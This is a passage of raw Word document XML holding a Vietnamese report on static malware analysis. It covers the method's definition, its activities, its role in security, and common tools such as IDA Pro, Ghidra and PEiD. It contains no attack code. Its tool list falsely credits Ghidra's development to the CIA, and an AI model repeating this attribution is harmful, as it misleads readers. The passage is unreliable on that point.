          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tổng quan về phân tích tĩnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="661C3F18" w14:textId="3AED86FF"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Phân tích tĩnh mã độc (Static Malware Analysis) là quá trình nghiên cứu và xem xét mã độc một cách tĩnh, tức là không chạy mã độc trên một hệ thống thực sự. Trong phân tích tĩnh, các nhà nghiên cứu sẽ kiểm tra tệp tin hoặc chương trình đích mà họ nghi ngờ chứa mã độc mà không thực sự chạy nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD576E"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Phân tích tĩnh mã độc thường bao gồm các hoạt động như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA8A46B" w14:textId="0312F433" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích cấu trúc: Điều này bao gồm việc xem xét mã máy nguồn, mã bytecode hoặc các tệp tin thực thi khác để tìm hiểu về cấu trúc tổ chức của mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1658B9AC" w14:textId="092EFE54" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích chuỗi ký tự: Các nhà nghiên cứu sẽ tìm kiếm chuỗi ký tự độc hại, ví dụ như địa chỉ URL, tên tệp tin, hoặc chuỗi mã hóa có thể gợi ý về hoạt động độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42965712" w14:textId="6ADFA007" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích mã hóa: Mã độc thường mã hóa hoặc mã hóa các phần quan trọng của chính nó để tránh phát hiện. Phân tích tĩnh có thể giúp tìm hiểu cách mã độc này được mã hóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007AC4D" w14:textId="1F90AE02" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích luồng điều khiển: Xác định các điểm bắt đầu và điểm kết thúc của các chức năng hoặc hành vi độc hại trong mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DDD0B9" w14:textId="054C5065" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích tương tác tệp tin: Xác định các tệp tin, thư mục, và tài nguyên hệ thống mà mã độc có thể tương tác hoặc thay đổi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9CEEE6" w14:textId="77777777" w:rsidR="00C41018"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Phân tích tĩnh mã độc có thể giúp nhận biết các đặc điểm và tính năng độc hại mà không cần chạy mã độc, giúp giảm nguy cơ nhiễm malware. Tuy nhiên, phân tích tĩnh cũng có hạn chế, vì nó không thể cung cấp thông tin về hành vi của mã độc khi thực sự chạy trên hệ thống. Do đó, nó thường được sử dụng cùng với phân tích động (Dynamic Malware Analysis) để có cái nhìn toàn diện về mã độc và hoạt động của nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619F9C7" w14:textId="77777777" w:rsidR="00EE0876" w:rsidRPr="00EE0876" w:rsidRDefault="00EE0876" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2885AF0B" w14:textId="046736BA" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00EE0876" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc150717767"/>
      <w:bookmarkStart w:id="7" w:name="_Toc150718029"/>
      <w:bookmarkStart w:id="8" w:name="_Toc150718116"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vai trò của phân tích tĩnh</w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="2B990965"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Phân tích tĩnh đóng một vai trò quan trọng trong lĩnh vực bảo mật thông tin và phát triển phần mềm. Dưới đây là một số vai trò quan trọng của phân tích tĩnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A3DB6" w14:textId="06AB3193" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phát hiện mã độc và lỗ hổng bảo mật: Phân tích tĩnh giúp phát hiện các đoạn mã độc hại hoặc lỗ hổng bảo mật trong phần mềm mà không cần chạy nó. Điều này giúp các chuyên gia bảo mật tìm ra các vấn đề và điểm yếu trong mã nguồn trước khi chúng trở thành mối đe dọa nghiêm trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EE36AD" w14:textId="70998A20" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Đánh giá rủi ro và tổng quan bảo mật: Phân tích tĩnh giúp xác định các điểm yếu và lỗ hổng trong mã nguồn, từ đó đánh giá rủi ro và tổng quan về bảo mật của một ứng dụng hoặc hệ thống. Điều này giúp tổ chức thực hiện các biện pháp bảo mật thích hợp để bảo vệ hệ thống của họ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B4503B" w14:textId="4D54D088" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Hiểu cấu trúc và hoạt động của ứng dụng: Phân tích tĩnh giúp phát triển viên hiểu cấu trúc của ứng dụng và cách nó hoạt động. Điều này có thể giúp cải thiện sự hiểu biết về mã nguồn và phát triển ứng dụng an toàn hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176C8EA" w14:textId="49D0C241" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Kiểm tra tính đúng đắn và hiệu suất: Phân tích tĩnh có thể sử dụng để kiểm tra tính đúng đắn và hiệu suất của mã nguồn mà không cần thực hiện thử nghiệm trong môi trường thực tế. Điều này giúp xác định lỗi logic và tối ưu hóa mã nguồn trước khi triển khai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25069EEA" w14:textId="68B91113" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích mã nguồn mở: Phân tích tĩnh thường được sử dụng để xem xét mã nguồn mở, đảm bảo tính bảo mật và đáng tin cậy của các dự án phần mềm mã nguồn mở trước khi sử dụng chúng trong các ứng dụng và dự án khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6997A6A6" w14:textId="6433074E" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Phân tích mã độc và phần mềm gian lận: Phân tích tĩnh là công cụ quan trọng trong việc xác định mã độc và phần mềm gian lận, giúp phát hiện các dấu hiệu và cấu trúc độc hại trong mã nguồn mà không cần thực hiện thử nghiệm thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8EF344" w14:textId="14AC2164" w:rsidR="00C41018"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lastRenderedPageBreak/>
        <w:t>-Tóm lại, phân tích tĩnh là một phần quan trọng của quy trình bảo mật và phát triển phần mềm, giúp cải thiện tính bảo mật, độ tin cậy và hiệu suất của ứng dụng và hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D55839C" w14:textId="60726CBB" w:rsidR="00EE0876" w:rsidRPr="00EE0876" w:rsidRDefault="00EE0876" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691757D5" w14:textId="4AEB40E1" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00EE0876" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc150717768"/>
      <w:bookmarkStart w:id="10" w:name="_Toc150718030"/>
      <w:bookmarkStart w:id="11" w:name="_Toc150718117"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Một số công cụ phân tích tĩnh phổ biến</w:t>
      </w:r>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3F91884E"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Dưới đây là một số công cụ phân tích tĩnh mã độc phổ biến mà các nhà nghiên cứu malware và chuyên gia bảo mật thường sử dụng để kiểm tra mã độc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1BC58" w14:textId="41321C6A" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+IDA Pro: IDA Pro là một công cụ phân tích mã nguồn rộng rãi và mạnh mẽ, cho phép bạn xem xét mã máy nguồn và thực hiện phân tích tĩnh chi tiết. Nó cung cấp nhiều plugin và tính năng mạnh mẽ giúp phân tích các loại mã độc phức tạp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC7AD4" w14:textId="3A78F576" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Radare2: Radare2 là một công cụ mã nguồn mở dành cho phân tích mã độc. Nó cung cấp các tính năng tương tự như IDA Pro và có sự hỗ trợ cho nhiều kiến trúc máy tính.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6560FBF1" w14:textId="4D6D795F" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Ghidra: Ghidra cũng là một công cụ phân tích mã nguồn mở, được phát triển bởi Cơ quan Tình báo Trung ương Hoa Kỳ (CIA). Nó cho phép phân tích mã độc, xem xét biên dịch và giải mã, và cung cấp các tính năng mạnh mẽ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD8FA4" w14:textId="36123974" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Binary Ninja: Binary Ninja là một công cụ phân tích mã độc với giao diện dễ sử dụng. Nó cho phép phân tích và chỉnh sửa mã máy nguồn một cách tĩnh và động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D911A" w14:textId="39ABF5AF" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+PEiD: PEiD là một công cụ đặc biệt dành cho phân tích tệp tin thực thi Windows (chủ yếu là các tệp PE, Portable Executable). Nó giúp xác định loại packer và công cụ bảo vệ được sử dụng trong tệp PE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2947E" w14:textId="4E043279" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Cuckoo Sandbox: Mặc dù chủ yếu là một nền tảng phân tích động, Cuckoo Sandbox cũng cung cấp một số tính năng phân tích tĩnh để xem xét nội dung tệp và chức năng trước khi chạy mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5212E03C" w14:textId="2FC82067" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Online Malware Analysis Services: Có một số dịch vụ trực tuyến như VirusTotal và Hybrid Analysis cho phép bạn tải lên các tệp tin đáng ngờ để kiểm tra và phân tích tĩnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC04A71" w14:textId="2B8FCD9C" w:rsidR="00C41018"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Những công cụ này có thể hỗ trợ các chuyên gia bảo mật và nghiên cứu malware trong việc phát hiện, phân tích và hiểu về mã độc một cách chi tiết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29810631" w14:textId="77777777" w:rsidR="00EE0876" w:rsidRPr="00EE0876" w:rsidRDefault="00EE0876" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F4A0DA" w14:textId="5092D7E5" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc150717769"/>
      <w:bookmarkStart w:id="13" w:name="_Toc150718031"/>
      <w:bookmarkStart w:id="14" w:name="_Toc150718118"/>
      <w:r w:rsidRPr="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
